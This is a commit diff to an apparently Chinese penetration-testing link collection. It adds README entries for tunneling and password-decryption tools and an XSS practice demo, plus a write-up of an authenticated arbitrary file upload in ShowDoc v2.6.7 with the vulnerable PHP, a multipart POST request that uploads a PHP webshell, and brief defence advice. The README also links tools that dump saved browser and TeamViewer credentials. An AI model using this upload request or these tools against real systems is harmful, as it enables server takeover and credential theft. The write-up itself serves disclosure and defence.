add showdoc的api_page存在任意文件上传getshell&xss-demo-超级简单版本的XSS练习demo&xFTP6密码解密

README.md

@@ -149,6 +149,7 @@
 - [CVE-2020-2546，CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3](https://github.com/hktalent/CVE_2020_2546)
 - [tongda_oa_rce-通达oa 越权登录+文件上传getshell](https://github.com/clm123321/tongda_oa_rce)
 - [CVE-2020-11651-SaltStack Proof of Concept【认证绕过RCE漏洞】](https://github.com/0xc0d/CVE-2020-11651)|[CVE-2020-11651&&CVE-2020-11652 EXP](https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP)
+- [showdoc的api_page存在任意文件上传getshell](./showdoc的api_page存在任意文件上传getshell.md)
 
 ## <span id="head5"> 提权辅助相关</span>
 
@@ -273,6 +274,7 @@
 - [内网渗透中常用的c#程序整合成cs脚本，直接内存加载](https://github.com/uknowsec/SharpToolsAggressor)
 - [【漏洞库】又一个各种漏洞poc、Exp的收集或编写](https://github.com/coffeehb/Some-PoC-oR-ExP)
 - [内网渗透代理转发利器reGeorg](https://github.com/sensepost/reGeorg)|**相关文章:**[配置reGeorg+Proxifier渗透内网](https://www.k0rz3n.com/2018/07/06/如何使用reGeorg+Proxifier渗透内网)|[reGeorg+Proxifier实现内网sock5代理](http://jean.ink/2018/04/26/reGeorg/)|[内网渗透之reGeorg+Proxifier](https://sky666sec.github.io/2017/12/16/内网渗透之reGeorg-Proxifier)|[reGeorg+Proxifier使用](https://xz.aliyun.com/t/228)
+- [Neo-reGeorg重构的reGeorg ](https://github.com/L-codes/Neo-reGeorg)
 - [get_Team_Pass-获取目标机器上的teamviewerID和密码(你需要具有有效的目标机器账号密码且目标机器445端口可以被访问(开放445端口))](https://github.com/kr1shn4murt1/get_Team_Pass/)
 - [chromepass-获取chrome保存的账号密码/cookies-nirsoft出品在win10+chrome 80测试OK](./tools/chromepass/)|[SharpChrome-基于.NET 2.0的开源获取chrome保存过的账号密码/cookies/history](https://github.com/djhohnstein/SharpChrome)|[ChromePasswords-开源获取chrome密码/cookies工具](https://github.com/malcomvetter/ChromePasswords)
 - [java-jdwp远程调试利用](https://github.com/Lz1y/jdwp-shellifier)|相关文章:[jdwp远程调试与安全](https://qsli.github.io/2018/08/12/jdwp/)
@@ -335,6 +337,7 @@
 - [冰蝎 bypass open_basedir 的马](./tools/冰蝎bypass_open_basedir_shell.md)
 - [goproxy heroku 一键部署套装，把heroku变为免费的http(s)\socks5代理](https://github.com/snail007/goproxy-heroku)
 - [自己收集整理的端口、子域、账号密码、其他杂七杂八字典，用于自己使用](https://github.com/cwkiller/Pentest_Dic)
+- [xFTP6密码解密](./tools/xFTP6密码解密.md)
 
 ## <span id="head8"> 文章/书籍/教程相关</span>
 
@@ -395,6 +398,7 @@
 - [NTLM中继攻击的新方法](https://www.secureauth.com/blog/what-old-new-again-relay-attack)
 - [PbootCMS审计](./books/PbootCMS审计.pdf)
 - [De1CTF2020系列文章](https://github.com/De1ta-team/De1CTF2020)
+- [xss-demo-超级简单版本的XSS练习demo](https://github.com/haozi/xss-demo)
 
 ## <span id="head9"> 说明</span>
 

showdoc的api_page存在任意文件上传getshell.md

@@ -0,0 +1,98 @@
+##  showdoc的api_page存在任意文件上传【需要登录】
+
+### 背景
+
+ShowDoc is a tool greatly applicable for an IT team to share documents online一个非常适合IT团队的在线API文档、技术文档工具
+
+官网 ：https://www.showdoc.cc/ 
+
+GitHub主页：https://github.com/star7th/showdoc
+
+当前测试版本：[v2.6.7](https://github.com/star7th/showdoc/releases/tag/v2.6.7)
+
+### 漏洞点
+
+https://github.com/star7th/showdoc/blob/master/server/Application/Api/Controller/PageController.class.php#L258
+
+```php
+//上传附件
+    public function upload(){
+        $login_user = $this->checkLogin();
+        $item_id = I("item_id/d") ? I("item_id/d") : 0 ;
+        $page_id = I("page_id/d") ? I("page_id/d") : 0 ;
+        $uploadFile = $_FILES['file'] ;
+ 
+        if (!$page_id) {
+            $this->sendError(10103,"请至少先保存一次页面内容");
+            return;
+        }
+        if (!$this->checkItemPermn($login_user['uid'] , $item_id)) {
+            $this->sendError(10103);
+            return;
+        }
+        
+        if (!$uploadFile) {
+           return false;
+        }
+        
+        if (strstr(strip_tags(strtolower($_FILES['editormd-image-file']['name'])), ".php") ) {
+            return false;
+        }
+
+        $upload = new \Think\Upload();// 实例化上传类
+        $upload->maxSize  = 4145728000 ;// 设置附件上传大小
+        $upload->rootPath = './../Public/Uploads/';// 设置附件上传目录
+        $upload->savePath = '';// 设置附件上传子目录
+        $info = $upload->uploadOne($uploadFile) ;
+        if(!$info) {// 上传错误提示错误信息
+          $this->error($upload->getError());
+          return;
+        }else{// 上传成功 获取上传文件信息
+          $url = get_domain().__ROOT__.substr($upload->rootPath,1).$info['savepath'].$info['savename'] ;
+          $insert = array(
+            "uid" => $login_user['uid'],
+            "item_id" => $item_id,
+            "page_id" => $page_id,
+            "display_name" => $uploadFile['name'],
+            "file_type" => $uploadFile['type'],
+            "file_size" => $uploadFile['size'],
+            "real_url" => $url,
+            "addtime" => time(),
+            );
+          $ret = D("UploadFile")->add($insert);
+
+          echo json_encode(array("url"=>$url,"success"=>1));
+        }
+
+    }
+```
+
+相比 https://github.com/star7th/showdoc/blob/master/server/Application/Api/Controller/PageController.class.php#L212 的uploadImg() 有过滤,附件上传upload()没有任何过滤.可以直接上传shell。
+
+burp的post数据大致如下：
+
+```
+POST /show/server/index.php?s=/api/page/upload HTTP/1.1
+
+------WebKitFormBoundaryzOQywSoNbAALAwKn
+Content-Disposition: form-data; name="page_id"
+
+22
+------WebKitFormBoundaryzOQywSoNbAALAwKn
+Content-Disposition: form-data; name="item_id"
+
+3
+------WebKitFormBoundaryzOQywSoNbAALAwKn
+Content-Disposition: form-data; name="file"; filename="cs.php"
+Content-Type: image/png
+
+‰PNG
+
+------WebKitFormBoundaryzOQywSoNbAALAwKn--
+```
+
+### 防御
+
+增加过滤，同时运维人员设置上传目录禁止执行，只允许写入读取，做好权限分配。
+
+来源于土司：https://www.t00ls.net/thread-56340-1-1.html 由[Mrxn](https://github.com/Mr-xn) 整理 ，欢迎大家前往土司投稿注册发言。